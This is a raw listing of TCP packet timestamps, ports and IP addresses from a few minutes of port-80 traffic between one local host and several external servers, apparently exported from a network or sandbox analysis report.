                                                                                    Mar 18, 2024 14:49:10.082673073 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:10.084331036 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:10.084362984 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:10.084592104 CET4979080192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:10.084743977 CET4979080192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:10.260776043 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:16.305844069 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:16.487921000 CET804979191.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:16.488091946 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:16.488398075 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:16.670959949 CET804979191.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:16.670984030 CET804979191.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:16.671164989 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:17.992849112 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:19.009121895 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:19.191211939 CET804979291.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:19.191473961 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:19.191752911 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:19.375544071 CET804979291.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:19.375555992 CET804979291.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:19.375706911 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:20.695355892 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.711191893 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.893050909 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:21.893364906 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.894691944 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.894714117 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.894790888 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.076785088 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.076869011 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.076883078 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.076925039 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.076982975 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.076992989 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.077100992 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.077115059 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.077265978 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.077434063 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.077569962 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.077604055 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.132461071 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.258867025 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.258994102 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259129047 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.259269953 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259322882 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.259412050 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259437084 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.259489059 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259635925 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259859085 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259954929 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.260107040 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.301177025 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.440951109 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.440963984 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441109896 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441216946 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441447973 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441576958 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441593885 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441607952 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441696882 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441710949 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441725016 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.442418098 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:23.397871971 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.415807962 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.598037958 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.598249912 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.598413944 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811172009 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811224937 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811266899 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811304092 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811382055 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811469078 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811497927 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811537981 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811570883 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811603069 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811654091 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811702013 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811745882 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811821938 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811963081 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.993536949 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993622065 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993647099 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993668079 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993689060 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993796110 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993815899 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.993818045 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993838072 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993859053 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993881941 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993901968 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993921995 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993941069 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993954897 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.993954897 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.993958950 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.994040966 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.994040966 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.994210005 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.994313955 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:25.176207066 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:46.529427052 CET4979680192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:46.684031963 CET804979684.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:46.684246063 CET4979680192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:46.684406996 CET4979680192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:46.838862896 CET804979684.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:46.839524031 CET804979684.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:49.204818010 CET4979780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:49.359215021 CET804979784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:49.359421015 CET4979780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:49.359643936 CET4979780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:49.514256954 CET804979784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:49.514337063 CET804979784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:51.876235962 CET4979880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:52.031127930 CET804979884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:52.031388044 CET4979880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:52.032747030 CET4979880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:52.032854080 CET4979880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:52.188095093 CET804979884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:52.188282013 CET804979884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:52.188318014 CET4979880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:52.188352108 CET804979884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:52.188406944 CET4979880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:52.188735008 CET804979884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:52.343522072 CET804979884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:52.343941927 CET804979884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.563023090 CET4979980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:54.718741894 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.719106913 CET4979980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:54.719266891 CET4979980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:54.874015093 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874099970 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874159098 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874218941 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874274969 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874331951 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874387026 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874439955 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874492884 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874538898 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:49:54.874804020 CET4979980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:54.875103951 CET4979980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:54.875332117 CET4979980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:49:55.029890060 CET804979984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:50:00.654848099 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:01.655092955 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:03.670206070 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:07.684938908 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:15.698838949 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:22.729191065 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:23.743920088 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:25.759094954 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:29.773835897 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:37.787705898 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:44.818065882 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:45.832756042 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:47.847953081 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:51.862694025 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:50:59.876599073 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:06.906891108 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:07.921700954 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:09.936821938 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:13.951591015 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:21.965509892 CET4980080192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:28.880388021 CET4980380192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:29.885653019 CET4980380192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:31.900789976 CET4980380192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:35.915450096 CET4980380192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:36.114135027 CET4980480192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:36.208652973 CET8049804172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:36.208950043 CET4980480192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:36.209099054 CET4980480192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:36.303889036 CET8049804172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:36.317581892 CET8049804172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:36.318064928 CET8049804172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:36.318428993 CET4980480192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:37.712023020 CET4980480192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:38.727667093 CET4980580192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:38.822271109 CET8049805172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:38.822577953 CET4980580192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:38.822796106 CET4980580192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:38.917222023 CET8049805172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:38.928982019 CET8049805172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:38.929338932 CET8049805172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:38.929472923 CET4980580192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:40.336488008 CET4980580192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.352118015 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.446415901 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.447024107 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.448381901 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.448472023 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.542951107 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543020964 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543138027 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543211937 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543211937 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.543256044 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543296099 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.543325901 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543358088 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.543368101 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543431997 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543473005 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543512106 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.543575048 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.543755054 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.543867111 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.556816101 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.556921005 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.557199955 CET4980680192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:41.637830973 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.637950897 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638010979 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638050079 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638087988 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638127089 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638164997 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638304949 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638398886 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638438940 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638531923 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638643026 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638691902 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638734102 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638776064 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.638971090 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.639060974 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.639101028 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.639139891 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:41.651377916 CET8049806172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:43.929402113 CET4980380192.168.11.20192.151.224.197
                                                                                    Mar 18, 2024 14:51:43.976516008 CET4980780192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:44.071588039 CET8049807172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:44.071861982 CET4980780192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:44.071964979 CET4980780192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:44.166826010 CET8049807172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:44.180207014 CET8049807172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:44.180295944 CET8049807172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:44.180541039 CET4980780192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:44.180632114 CET4980780192.168.11.20172.67.130.3
                                                                                    Mar 18, 2024 14:51:44.275677919 CET8049807172.67.130.3192.168.11.20
                                                                                    Mar 18, 2024 14:51:49.529632092 CET4980880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:49.684178114 CET804980884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:49.684478998 CET4980880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:49.684587955 CET4980880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:49.839251995 CET804980884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:49.839348078 CET804980884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:52.210199118 CET4980980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:52.364871979 CET804980984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:52.365509033 CET4980980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:52.365895987 CET4980980192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:52.520643950 CET804980984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:52.520714045 CET804980984.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:54.897525072 CET4981080192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:55.052315950 CET804981084.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:55.052481890 CET4981080192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:55.054939985 CET4981080192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:55.055023909 CET4981080192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:55.209875107 CET804981084.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:55.210093021 CET804981084.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:55.210293055 CET4981080192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:55.210329056 CET804981084.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:55.210464954 CET4981080192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:55.210592031 CET804981084.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:55.365480900 CET804981084.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:55.365900993 CET804981084.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.583473921 CET4981180192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:57.738367081 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.738698959 CET4981180192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:57.738933086 CET4981180192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:57.893495083 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.893750906 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.893822908 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.893881083 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.893935919 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.893990040 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.894047022 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.894109964 CET4981180192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:57.894134045 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.894242048 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.894365072 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.894376993 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:51:57.894720078 CET4981180192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:57.895091057 CET4981180192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:57.895349026 CET4981180192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:51:58.049578905 CET804981184.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:52:11.376439095 CET4981280192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:11.542232990 CET8049812217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:11.542434931 CET4981280192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:11.542639017 CET4981280192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:11.708492994 CET8049812217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:11.710045099 CET8049812217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:11.710109949 CET8049812217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:11.710311890 CET4981280192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:13.048002958 CET4981280192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:14.063781023 CET4981380192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:14.229448080 CET8049813217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:14.229675055 CET4981380192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:14.229849100 CET4981380192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:14.395292997 CET8049813217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:14.397109985 CET8049813217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:14.397138119 CET8049813217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:14.397443056 CET4981380192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:15.734875917 CET4981380192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:16.750637054 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:16.916878939 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:16.917125940 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:16.918484926 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:16.918643951 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.085181952 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.085253000 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.085365057 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.085454941 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.085531950 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.085546970 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.085578918 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.085778952 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.085805893 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.085958004 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.085972071 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.085999966 CET8049814217.70.184.50192.168.11.20
